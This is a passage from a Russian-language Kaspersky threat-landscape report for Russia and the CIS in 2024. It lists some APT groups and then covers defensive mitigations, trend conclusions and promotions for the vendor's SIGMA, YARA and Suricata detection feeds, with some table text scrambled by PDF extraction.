2022 – Азербайджан, Компании из YoroTrooper Шпионаж,

Беларусь, государственного, Подробнее
2023 кража данных
Кыргызстан, энергетического
Россия, и технологического
Таджикистан, секторов
Узбекистан

2022 – Беларусь, Компании из MATA Шпионаж, Подробнее

2023 Россия энергетического кража данных
и оборонного секторов

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Атаки в публичном поле на основе OSINT Содержание 113

Также стоит отдельно упомянуть, что наши коллеги из ICS CERT выпустили два отчета, в которых они
достаточно подробно описали инциденты произошедшие в сфере промышленной кибербезопасности
во второй половине 2023 года:

APT и финансовые атаки на промышленные организации во второй половине

2023 года

Подробнее

Второе полугодие 2023 года — краткий обзор основных инцидентов

промышленной кибербезопасности

Подробнее

Ландшафт угроз для России и СНГ 2024

Митигации Содержание 114

Митигации
На основе предыдущих разделов отчета и экспертизы, мы составили ряд важных митигаций, которые
позволят снизить вероятность эксплуатации уязвимостей и потенциального возникновения угроз
в инфраструктуре. Перечень митигаций представлен ниже.

Sandbox
Используйте технологию Sandbox для детонации вложений в электронной почте. Это может
предотвратить попадание вредоносного ПО на рабочие устройства сотрудников. Решение Kaspersky
Anti Targeted Attack22 включает в себя эту технологию.

Экспертные тренинги
Повышайте компетентность вашего персонала в области информационной безопасности.

Тренинги пользователей
Проводите регулярные тренинги среди пользователей, чтобы снизить вероятность успешных для
атакующих фишинга или социальной инженерии.

Оценка зрелости
По возможности, проводите оценку зрелости внутреннего SOC.

Отключение скриптовых сред и макросов

• Если возможно, включите режим PowerShell Constrained Language в настройках проверки

целостности кода пользовательского режима Device Guard (UMCI), чтобы ограничить возможности
вредоносного кода.
• Заблокируйте запуск макросов из файлов Office, загруженных из интернета. В качестве
альтернативы можно запретить все макросы, кроме обладающих цифровой подписью.

22 KATA

Ландшафт угроз для России и СНГ 2024

Митигации Содержание 115

Принцип наименьших привилегий

• Применяйте многоуровневую модель административных учетных записей, чтобы исключить

обладание ненужными правами доступа или привилегиями.
• Только в случае крайней необходимости используйте учетные записи с полными привилегиями
в рамках всей организации.
• Дополнительно ограничивайте предоставление привилегий по времени.
• Регулярно просматривайте и удаляйте уже ненужные пользовательские разрешения.
• Определите самые приоритетные цели (устройства, службы и пользователи), чтобы минимизировать
доступ к ним.

MFA
Включите многофакторную аутентификацию, используйте сложные пароли и политики блокировки
учетных записей на всех сетевых узлах с удаленным доступом, чтобы защититься от атак методом
грубого перебора.

Закрытие известных уязвимостей

Как можно скорее устанавливайте исправления известных уязвимостей на всех устройствах с выходом
в интернет и возможностью удаленного доступа. С Kaspersky Vulnerability Data Feed23 ваша организация
будет обладать всей информацией об уязвимостях безопасности и сопутствующей информацией
Threat Intelligence.

Anti-malware products & services

• Критически необходимым является применение надежного защитного решения с функциями

поведенческого обнаружения угроз. Все необходимые возможности доступны в решении Kaspersky
Endpoint Security24.
• Рассмотрите возможность использования внутренних и (или) внешних сервисов обнаружения
и реагирования (MDR), чтобы повысить вероятность обнаружения атак и своевременного
реагирования на ранних этапах.
• Регулярное проведение тестирования на проникновение и RedTeam-проектов помогает значительно
сократить для злоумышленников поверхность атаки и позволяет подготовить BlueTeam к отражению
актуальных угроз.

Надежная аутентификация

• Пользуйтесь в пределах организации менеджерами паролей.

• Задайте ограничения на вход (по числу попыток и пр.).
• Принудительно включите многофакторную аутентификацию в открытых извне службах и учетных
записях, относящихся к группе риска.

23 KVDF 24 KES

Ландшафт угроз для России и СНГ 2024

Митигации Содержание 116

Защита привилегированных учетных записей

• Используйте учетные записи с расширенными привилегиями только в административных целях.

• Подумайте над разграничением привилегированных учетных записей и групп, нуждающихся
в дополнительной защите, от остальной организации.

Сегментация сети

• Определите критически важные бизнес-системы, изолируйте их и примените к ним

соответствующие меры сетевой безопасности.
• Рассмотрите возможность осуществления мониторинга сети.
• Включите на компьютерах функции ведения журнала и аудита, используйте их для обнаружения
подозрительной активности.
• Проводите аудит или храните записи обо всех устройствах, которые могут подключаться к вашей
сети, и уделяйте особое внимание наиболее ценным активам.
• Проведите исследование структуры вашей сети: изучите потоки данных, матрицу прав доступа и т. д.

Ландшафт угроз для России и СНГ 2024

Выводы Содержание 117

Выводы
Как вывод, следует отметить, что ландшафт угроз представляет собой постоянно изменяющуюся
и всеохватывающую динамику атак и угроз в различных регионах и отраслях. Данная динамика требует
постоянного анализа со стороны защитников для подготовки своей инфраструктуры к релевантным
угрозам.

Проанализировав все данные, описанные в данном отчете, мы можем выделить следующие тренды:

• Угроза хактивизма только набирает обороты. Атакам подвергаются любые организации со слабой
защитой, без привязки к конкретной индустрии, используя любые доступные инструменты
в открытой сети;
• Угроза APT группировок и шифровальщиков по-прежнему остаётся актуальной для данного региона
и не снижает своей значимости;
• Несмотря на большое количество угроз и рост хактивизма, мы наблюдаем сохранение привычного
сценария: основными объектами атак остаются организации с наименьшей подготовкой в области
кибербезопасности.

Правильно выстроенные процессы информационной безопасности и анализ тактик, техник и процедур,

атакующих остаются надежным средством противодействия киберугрозам на поле битвы.

Ландшафт угроз для России и СНГ 2024

Приложение №1 Содержание 118

Приложение №1

SIGMA
Для того, чтобы легче было создавать корреляционные правила на основе выявленных TTPs в ваших
SIEM-решениях, обратите внимание на Kaspersky SIGMA Feed. Фид представляет из себя набор
правил с описанием корреляционной логики, возникший в результате противодействия различным
киберугрозам в течение многих лет. Как понятно из названия, в фиде все правила написаны согласно
спецификации SIGMA, чтобы вне зависимости от SIEM-решения, развернутого в инфраструктуре,
можно было написать правила корреляции. Обращаем внимание, что после написания логики,
необходимо адаптировать правило под конкретную инфраструктуру, исключив доверенные учётные
записи и ложноположительные сработки.

YARA
Для обнаружения и поиска семейств вредоносных программ, используемых субъектами APT
и Crimeware рекомендуем воспользоваться Kaspersky YARA Feed. Данный фид основывается
на выходящих отчётах, посвящённых APT и Crimeware группировкам (доступны на Threat Intelligence
Portal в рамках сервиса APT и Crimeware Intelligence Reporting. Обновления происходят ежечасно при
наличии новых данных в выходящих отчётах.

Suricata
Для выявления сетевых атак в инфраструктуре рекомендуем обратить внимание на Kaspersky Suricata
фид, содержащий правила на выявление активности ВПО и на выявление эксплуатации уязвимостей:

Для подготовки правил на детект активности ВПО во внутренних системах автообработки

1 (внутренняя песочница) с помощью алгоритмов машинного обучения производится поиск
подозрительного трафика, затем его анализируют эксперты и вручную составляют правила.
Подозрительные сетевые взаимодействия отслеживаются на всём потоке ВПО, поступающем
в Лабораторию Касперского (в 2023 году мы обнаруживали 413K вредоносных файлов
ежедневно).

Правила на выявление попыток эксплуатации сетевых уязвимостей (CVE) составляются

2 по результатам регулярного мониторинга публикаций с аналитикой, GitHub репозиториев,
Telegram каналов и других ресурсов.

Kaspersky Suricata фид содержит маппинг всех правил на тактики и техники MITRE, маппинг
составляется экспертами команды Cyber Threat Intelligence.

Kaspersky Suricata фид по умолчанию содержит все правила в формате оповещения

1 (alert), однако для правил, прошедших также дополнительную проверку и тестирование —
выставляется флаг recommend_drop. Такие правила заказчики могут переводить на свое
усмотрение в режим drop.

Все правила в Suricata фиде тщательно проверяются на ложные срабатывания, а также

2 используются в наших премиум продуктах (KATA).

Ландшафт угроз для России и СНГ 2024

 Содержание 119

Cyber Threat Intelligence Reports

Наша команда также является создателями двух
объёмных исследований, выпущенных в 2022
BlackCat
Аналитические отчеты
«Лаборатории Касперского» и 2023 годах.

Первое посвящено группировкам

Pysa Clop (TA505)
шифровальщиков, в котором мы отобрали
самые популярные группировки по данным
LockBit 2.0
нашей статистики, подробно проанализировали
реализованные ими атаки и использованные
Ragnar Locker Conti / Ryuk

BlackByte Hive в них техники и тактики, соотнесли их с базой

знаний MITRE ATT&CK и нашли множество общих
TTPs.

Отчет дает представление о том, как

в целом организуют свои атаки группировки
вымогателей и как можно им противостоять.

Омерзительная Ознакомиться можно здесь:

восьмерка Подробнее
Тактики, техники и процедуры современных
группировок вымогателей

Второе исследование посвящено азиатским

APT-группировкам. За время нашей работы
Аналитические отчеты
«Лаборатории Касперского» мы отметили, что эти группировки затронули
больше всего стран и индустрий. И что
самое главное — проанализировав сотни
атак, мы отметили схожий почерк различных
группировок. Цели на различных этапах Cyber
Kill Chain достигаются с использованием
общего ограниченного количества техник,
с которыми сталкиваются защитники по всему
миру, и, к сожалению, они зачастую испытывают
трудности в обнаружении таких атак в своей
инфраструктуре.

Азиатские С остальными подробностями ознакомиться

APT-
можно здесь:

группировки Подробнее

Тактики, техники и процедуры

Ландшафт угроз для России и СНГ 2024

 Содержание 120

Digital Footprint Intelligence Reports

Наши коллеги из команды DFI также публикуют различные отчёты, связанные с деятельностью
злоумышленников в Darkweb.

Растущая популярность таких технологий, как

LLM (Large Language Models — большие языковые
модели) облегчает выполнение типовых задач
и повышает доступность информации, но вместе
с тем создает новые риски для информационной
безопасности.

Цель исследования — осветить деятельность

дарквеб-сообщества, связанную
с вредоносным применением инструментов
искусственного интеллекта (ИИ). Актуальная
информация о тенденциях и обсуждениях
в дарквебе позволит компаниям выстраивать
более эффективную защиту от постоянно
развивающихся угроз.

Ознакомиться с отчётом можно здесь:

Подробнее

Shadowy innovation

По мнению команды Kaspersky Digital Footprint

Intelligence, из фактов публичных утечек данных
Аналитические отчеты
«Лаборатории Касперского»
можно выделить много полезной информации —
тренды распространения, нацеленность
злоумышленников на определенные области
бизнеса, раскрытие парольной информации,
которая может быть использована как для
захвата отдельных пользовательских аккаунтов,
и для проникновения за периметр защиты
организации.

Что изменилось в 2023 году в сфере утечек

пользовательских данных и многом другом
они рассказывают в отчете «Значимые утечки
данных».

Ознакомиться с отчётом можно здесь:

Подробнее

Ландшафт угроз для России и СНГ 2024

 Аналитические отчеты
«Лаборатории Касперского»

[Link]

© 2024 АО «Лаборатория Касперского».

Зарегистрированные товарные знаки и знаки
#kaspersky
обслуживания являются собственностью
их правообладателей. #активируйбудущее